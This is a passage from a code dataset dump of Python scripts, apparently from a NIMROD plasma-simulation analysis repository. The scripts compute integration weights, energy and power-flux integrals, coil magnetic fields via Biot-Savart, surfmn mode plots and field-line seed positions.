self.fields.grid.set_debug(debug)\n self.fields.grid.set_3d_symm()\n\n @staticmethod\n def calc_nmodes(lphi):\n nmodes=int(2**lphi/3)+1\n return nmodes\n\n @staticmethod\n def calc_nplanes(lphi):\n nplanes = 2**lphi\n return nplanes\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n\n def setUpIntegrand(self):\n ''' This function calcualtes the weights for integration\n using normal quadrature'''\n ndim=self.fields.grid.rzp.ndim\n if ndim ==3:\n rz=self.fields.grid.rzp\n xy=self.fields.grid.xy\n elif ndim==4:\n if not self.fields.grid.symm_3d:\n print(\"integration assuming symmetric grid\")\n raise ValueError\n rz=self.fields.grid.rzp[:,:,:,0]\n xy=self.fields.grid.xy[:,:,:,0]\n else:\n #first dim is RZ component\n print(\"integration require ndim=3,4\")\n raise ValueError\n self.intWeight=np.zeros_like(rz[0])\n for jj in range(np.shape(self.intWeight)[1]):\n for ii in range(np.shape(self.intWeight)[0]):\n if not np.isnan(xy[:,ii,jj]).any():\n horz='m'\n vert='m'\n if ii==0: #logic ignore degenerate cases /\\ and \\/\n horz='l'\n elif ii== np.shape(self.intWeight)[0]-1:\n horz='r'\n elif np.isnan(xy[:,ii-1,jj]).any():\n horz='l'\n elif np.isnan(xy[:,ii+1,jj]).any():\n horz='r'\n if jj==0:\n vert='b'\n elif jj== np.shape(self.intWeight)[1]-1:\n vert='t'\n elif np.isnan(xy[:,ii,jj-1]).any():\n vert='b'\n elif np.isnan(xy[:,ii,jj+1]).any():\n vert='t'\n if horz=='l':\n if vert=='b':\n #bottom left\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj])\n elif vert=='t':\n #top left\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii,jj])* \\\n (rz[1,ii,jj]-rz[1,ii,jj-1])\n else:\n #left middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj-1])\n elif horz=='r':\n if vert=='b':\n #bottom right\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj])\n elif vert=='t':\n #top right\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj]-rz[1,ii,jj-1])\n else:\n #middle right\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj-1])\n else:\n if vert=='b':\n #bottom middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj])\n elif vert=='t':\n #top middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj]-rz[1,ii,jj-1])\n else:\n #middle middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj-1])\n return\n\n def integrateSurface(self,integrand,twopi=True):\n #first check to see if integrand is set up.\n if not self.intSet:\n self.setUpIntegrand()\n if twopi:\n phifac=np.pi*2.0\n else:\n phifac=1.0\n if type(integrand) == np.ndarray:\n integral=phifac*np.tensordot(integrand,self.intWeight,axes=([0,1],[0,1]))\n else:\n print(f\"Integrand of type {type(integrand)} is not supported\")\n raise TypeError\n return integral\n\n def integrateEnergy(self,plot_integrand=False):\n self.fields.energyDensity()\n if self.fields.filter is None:\n self.fields.calculateFilter()\n for key, integrand in self.fields.energyDict.items():\n if integrand.ndim == self.fields.filter.ndim:\n filtered_int = integrand * self.fields.filter\n else:\n filtered_int = integrand * self.fields.filter[...,0]\n integral=self.integrateSurface(filtered_int)\n print(key,integral)\n self.energyDict[key]=integral\n if plot_integrand:\n #todo This needs work\n self.plotIntegrand(filtered_int,imode=1)\n\n def integratePowerFlux(self,plot_integrand=False):\n self.fields.powerFlux()\n if self.fields.filter is None:\n self.fields.calculateFilter()\n for key, integrand in self.fields.powerFluxDict.items():\n filtered_int = integrand * self.fields.filter\n integral=self.integrateSurface(filtered_int)\n print(key,integral)\n if plot_integrand:\n #todo This needs work\n self.plotIntegrand(filtered_int,imode=1)\n self.powerDict[key]=integral\n\n def integratePowerFluxAdv(self,plot_integrand=False):\n self.fields.advectPowerFlux()\n if self.fields.filter is None:\n self.fields.calculateFilter()\n for key, integrand in self.fields.advectDict.items():\n filtered_int = integrand * self.fields.filter\n integral=self.integrateSurface(filtered_int)\n print(key,integral)\n if plot_integrand:\n #todo This needs work\n self.plotIntegrand(filtered_int,imode=1)\n self.powerDict[key]=integral\n\n def plotIntegrand(self,integrand,imode=None,title=\"Power Transfer\"):\n ndim=self.fields.grid.rzp.ndim\n if ndim ==3:\n rz=self.fields.grid.rzp\n xy=self.fields.grid.xy\n elif ndim==4:\n if not self.fields.grid.symm_3d:\n print(\"integration assumes symmetric grid\")\n raise ValueError\n rz=self.fields.grid.rzp[:,:,:,0]\n xy=self.fields.grid.xy[:,:,:,0]\n else:\n #first dim is RZ component\n print(\"integration require ndim=3,4\")\n raise ValueError\n if imode==None:\n pass\n else:\n figsize=[6,6]\n fig, ax = plt.subplots(figsize=figsize)\n ax.set_aspect('equal')\n ax.set(title=title )#r\"$v\\cdot \\nabla p$\")\n plt.contourf(rz[0],rz[1],integrand[...,imode])\n plt.colorbar()\n plt.show()\n\n def analyze_power(self,grid='close',npts=512,lphi=5,nonlin_order=2,plot=False):\n if grid == 'close':\n rmin=1.15\n rmax=2.3\n zmin=-1.25\n zmax=1.0\n elif grid == 'd3d':\n rmin=0.8\n rmax=2.5\n zmin=-1.5\n zmax=1.5\n else:\n print(f\"Grid = {grid} is not recognized\")\n raise ValueError\n #npts=128 #debug\n\n self.fields.set_method(\"powerflux\")\n self.set_3dgrid(rmin,rmax,zmin,zmax,npts,npts,lphi,nonlin_order)\n self.integrateEnergy()\n self.integratePowerFlux(plot_integrand=plot)\n volumeInt=np.ones_like(self.fields.grid.rzp[0,:,:,0])\n self.volume=self.integrateSurface(volumeInt)\n\n def analyze_power_adv(self,grid='close',npts=512,lphi=5,nonlin_order=2,plot=False):\n if grid == 'close':\n rmin=1.15\n rmax=2.3\n zmin=-1.25\n zmax=1.0\n elif grid == 'd3d':\n rmin=0.8\n rmax=2.5\n zmin=-1.5\n zmax=1.5\n else:\n print(f\"Grid = {grid} is not recognized\")\n raise ValueError\n #npts=128 #debug\n\n self.fields.set_method(\"advectPowerflux\")\n if grid ==None:\n self.set_3dgrid(rmin,rmax,zmin,zmax,npts,npts,lphi,nonlin_order)\n self.integratePowerFluxAdv(plot_integrand=plot)\n\n\n def print_integrals(self):\n for key, integral in self.energyDict.items():\n print(key, integral)\n for key, integral in self.powerDict.items():\n print(key, integral)\n print('volume ', self.volume)\n\n def clean_up(self):\n ''' Clean up fields to reduce memory foot print'''\n self.fields.clean_up()\n self.grid=None\n self.intSet=False\n self.intWeight=np.empty([1])\n\n\n###############################################################################\n# TESTING NOTES\n#############################\n# Test 1, integrate from r=1.5 to 2, z=-1,1\n# everypoint in domain, and volume is 1.75x2xpi\n# v=10.99557428756\n# test gets right answer for 30 pts to high degree\n\n# Test two, integrate volume from r=0.5 to 2.5, z=-1.5 to 1\n# some points are outside domain\n# pts volume\n# 30 35.1007188376975\n# 100 37.215318055511986\n# 200 37.68293725920001\n# 300 37.826641583095295\n# 500 37.96294543920083\n# 1000 38.05936996...\n# extrapolation yeilds a volume of 38.14\n# 300 pts error 0.82%\n# 500 pts error 0.46%\n# 1000 pts error 0.21% but slow\n#\n# based on these results I trust volume integral\n# 300x300 seems a good compromise between speed and accuracy\n# base on volume data\n# should verify with magnetic energy (test 3)\n\n#Test two, integrate magentic energy from r=0.5 to 2.5, z=-1.5 to 1\n# some points are outside domain, compare n=0 (excludes eq)\n# n=1 and n=5 energies, Comments these results of n=1 and\n# n=5 divide the energy by 2. But for n=/0 this should not\n# be done.\n#\n# pts E_0 E_1 E_5\n# 30 4.77153322e+02 7.88561043e+01 2.11200084e-01\n# 50 5.45079600e+02 8.14135131e+01 2.26558515e-01\n# 100 5.33019371e+02 8.25029029e+01 2.22909222e-01\n# 300 5.36869913e+02 8.26732084e+01 2.25595720e-01\n# 500 5.37585636e+02 8.27392466e+01 2.25714039e-01\n#\n# Note extrapolation for n=0,5 isn't great (R^2~.5,.6)\n# Errors of (n=0,1,5)\n# pts 30(13%,5%,7%)\n# pts 50(.6%,2%,.5%)\n# pts 100(3%,1%,2%)\n# pts 300(2%,.8%,1%\n# pts 500(2%,.7%,.9%)\n#\n# Conclusion, 100-300 points is good enought for 1% error\n" }, { "alpha_fraction": 0.4137382209300995, "alphanum_fraction": 0.6716615557670593, "avg_line_length": 34.40375518798828, "blob_id": "c519f0e6b350f2f689e46904a86ebd7256656bc7", "content_id": "cc06692e2fb7622d3a3d871f23a3233ba455f333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7541, "license_type": "no_license", "max_line_length": 145, "num_lines": 213, "path": "/biotSavart/biotSavart.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n#\n# Input files:\n# Ouput file:\n\nimport os\nimport numpy as np\nimport sys\nimport coilClass as cc\nimport integrateBS as bs\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nhomeDir = os.environ['HOME']\nfilePath = homeDir + '/SCRATCH/174446_novac_new_eq/surfmn_scan/case_15/'\n#filePath = homeDir+ '/SCRATCH/157458/03240/19120201_rmp/'\nrzfile = filePath + 'nimrod_bdry_rz.txt'\nbaseFileName = \"brmpn\"\nfileExt = \".dat\"\n\nphiPlanes = 4 #n=0->2\nphiPlanes = 100 #plotting\nsegmentsPerCoil = 50\nbaseCurrent = 1.0\nnPert = 1\n\n\n########### begin code #########\n#nimrod RZ node locations\nnodeRZ = np.loadtxt(rzfile,comments='%',delimiter=',', skiprows=1)\n# allocate xyz and b vectors\nprint(nodeRZ.shape)\n\nnodeXYZ = np.zeros([3,nodeRZ.shape[0],phiPlanes])\nbRZPhi = np.zeros([3,nodeRZ.shape[0],phiPlanes])\nbRPhase = np.zeros(1,dtype=np.complex_)\nbZPhase = np.zeros(1,dtype=np.complex_)\nbPhiPhase = np.zeros(1,dtype=np.complex_)\n#convert node locations to xyz coordinates at multiple phi planes\nfor iPhi in range(phiPlanes):\n sinPhi = np.sin(iPhi*2.0*np.pi/phiPlanes)\n cosPhi = np.cos(iPhi*2.0*np.pi/phiPlanes)\n nodeXYZ[0,:,iPhi]=nodeRZ[:,0]*cosPhi\n nodeXYZ[1,:,iPhi]=nodeRZ[:,0]*sinPhi\n nodeXYZ[2,:,iPhi]=nodeRZ[:,1]\n\n# set up c coils\n# in the future I can move this to an function\ncoilList=[]\n#for ii in range(6):\n# thisCurrent = baseCurrent * np.cos(np.pi*(ii)*nPert/3.0)\n# thisCoil = cc.coil(thisCurrent,segmentsPerCoil)\n# coilList.append(thisCoil)\n# coilList[ii].cCoil(ii+1)\n\n# coil rmp 2 or 3\ndistance_coil = 1.2\ncoil_theta = [0, .35, .5, .65]\ncoil_tilt = [0.25, .35, .75, 1.1]\ncoil_tilt = [0.25, .40, .75, 1.1]\n# coils for eq 28\ncoil_theta = [0, .15, .5, .85]\ncoil_tilt = [0.25, .65, .75, 0.85]\n#delta theta\ndelta_theta=0.20\ndelta_tilt=.15\n\ncoil_theta = [0, delta_theta, .5, 1-delta_theta]\ncoil_tilt = [0.25, .5+delta_tilt, .75, 1-delta_tilt]\nscope=False\nscope=True\n\nrmag_axis=1.7682\nzmag_axis=0.0\ncoil_r = 0.6\nfor ii in range(6):\n phi = np.pi * ii/3.0\n thisCurrent = baseCurrent * np.cos(phi*nPert)\n for jj in range(4):\n theta = coil_theta[jj] * 2.0 * np.pi\n# theta = np.pi * jj/2.0\n if (jj%2 == 0):\n this_m_current = -thisCurrent\n else:\n this_m_current= thisCurrent\n\n r0 = rmag_axis + distance_coil * np.cos(theta)\n z0 = zmag_axis + distance_coil * np.sin(theta)\n x0 = r0 * np.cos(phi)\n y0 = r0 * np.sin(phi)\n tx = 0.0\n# ty = (jj+1) * np.pi/2.0\n ty = coil_tilt[jj] * 2.0 * np.pi\n tz = phi\n\n # temp set rotation angles to zero to debug\n# tx=0.0\n# ty=0.0\n# tz=0.0\n\n thisCoil = cc.coil(this_m_current,segmentsPerCoil)\n thisCoil.planarCoil(x0,y0,z0,coil_r,tx,ty,tz)\n coilList.append(thisCoil)\n\n# plot coils\nfig =plt.figure()\nax = fig.add_subplot(111,projection='3d')\nax.plot_surface(nodeXYZ[0,:,0:int(4*phiPlanes/4)], nodeXYZ[1,:,0:int(4*phiPlanes/4)], nodeXYZ[2,:,0:int(4*phiPlanes/4)],color='purple',alpha=.2) \nfor iCoil in coilList:\n# print(iCoil.xyz[2,:])\n iCoil.plot_coil(ax)\n#ax.set_xlabel('X Label')\n#ax.set_ylabel('Y Label')\n#ax.set_zlabel('Z Label')\nax.set_axis_off()\nplt.show()\n\nrd3d= [2.443303419949772, 2.445003360252620, 2.435206281190796,\n 2.397229070763543, 2.349096435450708, 2.296697511366329,\n 2.226202284287925, 2.132775562815938, 2.027583832063605,\n 1.910630360626907, 1.778445679008138, 1.635079922339590,\n 1.484330005656411, 1.324367385828326, 1.162101456042379,\n 1.027709774120046, 0.9531004737753517, 0.9291925921464999,\n 0.9306128757867301, 0.9373734199854492, 0.9374716427460326,\n 0.9309174125983126, 0.9309062023801610, 0.9330912388264760,\n 0.9290759363555934, 0.9313924528732267, 0.9325192643910063,\n 0.9298801313664510, 0.9355275529633224, 0.9383072037111380,\n 0.9315511559488159, 0.9286559025958544, 0.9465601634341064,\n 1.000382927938164, 1.092264926894742, 1.215568147385899,\n 1.343869169462016, 1.443290163237878, 1.545839461727406,\n 1.659387736523215, 1.785869422676203, 1.919004656822144,\n 2.048477467998743, 2.170484269722559, 2.273692536052303,\n 2.345258986779728, 2.405126351903085, 2.441499638224660,\n 2.444671091311594, 2.441550619712000, 2.443303419949772 ]\n\nzd3d =[0.1070010083064705, 0.2407488482372501, 0.3804810616106032,\n 0.5159387361983736, 0.6503946165564584, 0.7935848357649634,\n 0.9352181481113857, 1.059155770383247, 1.178561334034986,\n 1.293970423413222, 1.384524187526246, 1.432284507191533,\n 1.453445898862813, 1.463657741995547, 1.445934022958783,\n 1.359242878727507, 1.195323634649968, 1.004001380805289,\n 0.8237611508094629, 0.6662857938612209, 0.5291230710159969,\n 0.4026518905384536, 0.2771781125246763, 0.1533390886307173,\n 2.974376768179259E-02, -9.479066317849494E-02, -0.2219425844279092,\n -0.3553396294163588,-0.4901821828518301, -0.6351465365923717,\n -0.8027612626835731, -0.9874117999240944,-1.170409819654592,\n -1.321107993701108, -1.416381737427392, -1.457845801192058,\n -1.463452619441855, -1.457140387484942,-1.446593354617252,\n -1.427322714872727,-1.380546621923976, -1.286917884397917,\n -1.155789433396968, -1.012819480748024,-0.8474364195572380,\n -0.6613050759653780,-0.4935139420070444, -0.3285717485346793,\n -0.1676609207868461,-2.517907021385858E-02,0.1070010083064715 ]\n\nfig = plt.figure(figsize=(6,6))\nax = fig.add_subplot(111)\ncoilList[0].plot_2D_coil(ax,'b')\ncoilList[1].plot_2D_coil(ax,'g')\ncoilList[2].plot_2D_coil(ax,'b')\ncoilList[3].plot_2D_coil(ax,'g')\nplt.plot(rd3d,zd3d,label=\"Wall\",c='k',ls=':')\nax.set_aspect(aspect=1.0)\nax.set_xlabel('R [m]')\nax.set_ylabel('Z [m]')\nplt.title(\"Error Field Coils\")\nplt.tight_layout()\nplt.show()\nif (scope):\n sys.exit()\n\nfor iNode in range(nodeXYZ.shape[1]):\n print(\"Calculating node: \" + str(iNode))\n for iPhi in range(nodeXYZ.shape[2]):\n print(\"Calculating plane: \" + str(iPhi))\n sys.stdout.flush()\n bXYZ=np.zeros(3)\n for iCoil in coilList:\n bXYZ[:]+=bs.intCoil(iCoil,nodeXYZ[:,iNode,iPhi])\n phi = 2.0*np.pi*iPhi/phiPlanes\n### transform to bRZPhi\n# bRZPhi accounts for the negative in Bphi due to rzphi coordinates\n bRZPhi[0,iNode,iPhi] = bXYZ[0]*np.cos(phi)+bXYZ[1]*np.sin(phi)\n bRZPhi[1,iNode,iPhi] = bXYZ[2]\n bRZPhi[2,iNode,iPhi] = bXYZ[0]*np.sin(phi)-bXYZ[1]*np.cos(phi)\n\nbRPhase=np.fft.fft(bRZPhi[0,:,:],axis=1)/(float(phiPlanes))\nbZPhase=np.fft.fft(bRZPhi[1,:,:],axis=1)/(float(phiPlanes))\nbPhiPhase=np.fft.fft(bRZPhi[2,:,:],axis=1)/(float(phiPlanes))\n\n### write brmp files\nif (phiPlanes % 2 == 0): #even\n maxnphi = int(phiPlanes/2)\nelse: #odd\n maxnphi = int((phiPlanes+1)/2)\nfor ii in range (maxnphi +1):\n if ii==maxnphi:\n fac=0.5\n else:\n fac=1.0\n print(ii, maxnphi, fac)\n tempFileName = filePath + baseFileName +\"{0:0=2d}\".format(ii) + fileExt\n thisFile = open(tempFileName,'w')\n for jj in range(bRPhase.shape[0]):\n thisLine ='{: 16.16e}'.format(fac*bRPhase[jj,ii].real) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bRPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].real) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].real) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].imag) + \"\\n\"\n thisFile.write(thisLine)\n thisFile.close()\n\n#for iCoil in coilList:\n# bvec+=bs.intCoil(iCoil,np.asarray([0.0,0.0,0.0]))\n" }, { "alpha_fraction": 0.5678274631500244, "alphanum_fraction": 0.6507276296615601, "avg_line_length": 26.105634689331055, "blob_id": "6ad8f5f1a6ebf3d5ded5611de6f13c882a167c00", "content_id": "07ca23da4ac2184aecda7cdbebc7186d62107f6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3848, "license_type": "no_license", "max_line_length": 99, "num_lines": 142, "path": "/plotingScripts/surfmnPlts2.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\nimport scipy.interpolate as interp\n\n\ndef get_m_index(m, m_max):\n return m+m_max\n\nplot_type = \"nonlinear\"\nplot_type = \"ntm\"\n#vacuum,linear, nonlinear\n\n\nrun_dir = \"19092601_l5\"\n#run_dir = \"1908163\"\ndump_num = \"20000\"\nhomeDir = os.environ['HOME']\nscratchDir = homeDir + '/SCRATCH'\nfileName = scratchDir+'/174446_novac_fl/eq26/1908013/08000/surfmn.08000.h5'\nfileName = scratchDir+'/174446_novac_debug/vac_eq28_rmp/surfmn.00100.h5'\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = scratchDir+'/174446_novac_fl/eq26/'+run_dir+'/'+ dump_num +'/surfmn.'+ dump_num + '.h5'\n\n#run_dir = \"case_15_vac\"\n#dump_num = \"00100\"\n#fileName = scratchDir+'/174446_novac_new_eq/surfmn_scan/'+run_dir+'/surfmn.'+ dump_num + '.h5'\n\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005.h5'\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005_rr.h5'\n#fileName = scratchDir+'/166439//03300_vac_eq/complexconj_rmp_vac/surfmn.00005.h5'\n\n\n#n1_scale\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nsfac=1e4\nvmax_n1 = 90.0\nvmax_n3 = 70.0\n\nm_plot_list = [-2, 0, 2]\nq1_plot_list = [-2,-3,-4]\nq3_plot_list = [-1.67,-2.00,-2.33]\n\nprofNames = ['Vprime','q']\nwith h5py.File(fileName,'r') as fc:\n# for aname, avalue in fc.attrs.items():\n# print(aname,avalue)\n mrGrid = fc['surfmnGrid'][:]\n bmn = fc['Bmn001'][:]\n bmn3 = fc['Bmn003'][:]\n rho = fc['rho'][:]\n profs = fc['prof'][:]\n# print(fc.keys())\n \npsi_of_q = interp.interp1d(profs[1,:],rho)\nm1_range = np.linspace(-1.06,-4.5)\nq_of_m1 = psi_of_q(m1_range)\n#m3_range = np.linspace(-3.129,-15)\n#q_of_m3 = psi_of_q(m3_range/3.00)\n\nm_max = int((bmn.shape[1]-1)/2)\n#print(m_max)\n\n#print(mrGrid.shape[2])\n#print(bmn.shape)\nplt.set_cmap('nipy_spectral')\nplt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn*sfac,levels=300,vmax=vmax_n1)\nplt.plot(m1_range,q_of_m1,c='w')\nplt.colorbar()\n#plt.title(n1_title)\nplt.ylabel(r'<r>')\nplt.xlabel('m')\nplt.show()\n\nplt.set_cmap('nipy_spectral')\nplt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn3*sfac,levels=300,vmax=vmax_n3)\n#plt.plot(m3_range,q_of_m3,c='w')\n#plt.title(n3_title)\nplt.ylabel(r'<r>')\nplt.xlabel('m')\nplt.colorbar()\nplt.show()\n\n\n#plt.plot(rho,profs[0,:],label=profNames[0])\n#plt.legend()\n#plt.show()\n\n#plt.plot(rho,profs[1,:],label=profNames[1])\n#plt.legend()\n#plt.show()\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn[:,this_i], label=plt_lbl)\nfor this_q in q1_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=1 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()\n\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn3[:,this_i], label=plt_lbl)\nfor this_q in q3_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=3 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()" }, { "alpha_fraction": 0.5241855978965759, "alphanum_fraction": 0.552484393119812, "avg_line_length": 32.77777862548828, "blob_id": "79a3632c5f199a499430882342889043d54869b8", "content_id": "15f583b7a6ddd508080211f43c22dc5594fa8fd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3039, "license_type": "no_license", "max_line_length": 90, "num_lines": 90, "path": "/nimflSeed/solSeed.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script randomly generates a collection of seed locations basd on the sol file '''\n\n################################################################################\n# Set up envirment and import modules\n################################################################################\nimport sys\nsys.path.insert(0, \"./\")\nimport os\npwd = os.getcwd()\nhomeDir = os.environ['HOME']\nimport numpy as np\nimport random as ra\nimport matplotlib.pyplot as plt\n################################################################################\n# User defined input\n################################################################################\nsolDir = \"/SCRATCH/166439/03300_vac_eq/complexconj_rmp/\"\nsolFileName = \"sol.grn\"\nsolCon = 1 # This is the seperatrix\n\nwriteFileName = \"start_positions.dat_sep2\"\nwriteDir = \"/SCRATCH/166439/03300_vac_eq/start_pos_files/\"\n\nnPoints = 3000\nsigmaDist = 0.005\nphiZero = 0.0\nrandomPhi = True # Ture\n\n################################################################################\n# Start of code\n################################################################################\n\nfullSolFile = homeDir+solDir+solFileName\nfullWriteFile = homeDir + writeDir + writeFileName\nxyCon = [] # list of contours\nit = 0\nwith open(fullSolFile, 'r') as grnFile:\n while(True):\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if(len(thisWords)==0): break\n if (thisWords[0] != 'x'+str(it)):\n sys.exit(\"Expecting x\" +str(it) + \" read \" + thisWords[0])\n nSep = int(thisWords[1])\n thisCon = np.zeros([nSep,2])\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for ix, xx in enumerate(thisWords):\n thisCon[ix,0]= float(xx)\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if (thisWords[0] != 'y'+str(it)):\n sys.exit(\"Expecting y\" +str(it) + \" read \" + thisWords[0])\n if (int(thisWords[1])!=nSep): sys.exit(\"nSep x != nSep y\")\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for iy, yy in enumerate(thisWords):\n thisCon[iy,1]= float(yy)\n xyCon.append(thisCon)\n it+=1\n\nthisCon = xyCon[solCon]\nnCon = thisCon.shape[0]\nthisRZP = np.zeros([nPoints,3])\nfor ii in range(nPoints):\n thisIn = ra.randint(0,nCon-1)\n thisR = ra.gauss(0,sigmaDist)\n thisT = ra.uniform(0,np.pi*2.0)\n if randomPhi:\n thisPhi = ra.uniform(0,np.pi*2.0)\n else:\n thisPhi = phi0\n thisRZP[ii,0]=thisCon[thisIn,0]+thisR * np.cos(thisT)\n thisRZP[ii,1]=thisCon[thisIn,1]+thisR * np.sin(thisT)\n thisRZP[ii,2]=thisPhi\n\nfor ii, iCon in enumerate(xyCon):\n plt.scatter(iCon[:,0],iCon[:,1],s=1, label = \"Contour :\" + str(ii))\n plt.legend()\nplt.scatter(thisRZP[:,0], thisRZP[:,1],s=1)\nplt.show()\n\nwith open(fullWriteFile,'w') as thisFile:\n thisFile.write(str(nPoints)+\"\\n\")\n for jj in range(nPoints):\n thisLine = '{: 16.16e}'.format(thisRZP[jj,0]) + \", \" \n thisLine+= '{: 16.16e}'.format(thisRZP[jj,1]) + \", \" \n thisLine+= '{: 16.16e}'.format(thisRZP[jj,2]) + \"\\n\" \n thisFile.write(thisLine)" }, { "alpha_fraction": 0.5478668212890625, "alphanum_fraction": 0.5974678993225098, "avg_line_length": 35.5, "blob_id": "f2fd1b0305aeb24609c9261c04978f64732dc195", "content_id": "0da898c6d017543d0aed3aba42bc893569a1ba83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5766, "license_type": "no_license", "max_line_length": 132, "num_lines": 158, "path": "/surfmnNim2/surfmnClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport sys, getopt\nimport os\nimport xySliceClass as xy\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\nclass SurfmnClass:\n ''' Base class for surfmn calculations '''\n def __init__(self,argv):\n ''' initialize an surfmn instance with default inputs'''\n self.pd=-1\n self.mx=-1\n self.my=-1\n self.mrange=10\n self.xyFile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/n1_run1/orginal_exb/300000/xy_slice.bin'\n self.homeDir = os.environ['HOME']\n self.parseInput(argv)\n\n def parseInput(self,argv):\n ''' This function parses the command line input for surfmn2.py'''\n try:\n opts, args = getopt.getopt(argv,\"hs:x:y:p:m:\")\n except getopt.GetoptError:\n print('syrfmn2.py -s <xy_slice> -x <mx> -y <my> -p <pd> -m <mrange>')\n sys.exit(2)\n for opt,arg in opts:\n if opt == '-h':\n print('syrfmn2.py -s <xy_slice> -x <mx> -y <my> -p <pd> -m <mrange>')\n sys.exit(0)\n if opt == '-s':\n self.xyFile = arg\n if opt =='-x': \n self.mx = int(arg)\n if opt =='-y': \n self.my = int(arg)\n if opt =='-p': \n self.pd = int(arg)\n if opt =='-m': \n self.mrange = int(arg)\n if self.mx<0:\n sys.exit(\"specify mx with -mx\")\n if self.my<0:\n sys.exit(\"specify my with -my\")\n if self.pd<0:\n sys.exit(\"specify pd with -pd\")\n\n def calcBmn(self,xyFields):\n self.Z0 = xyFields.Z[0,0] # assumes flux aligned mesh\n self.R0 = 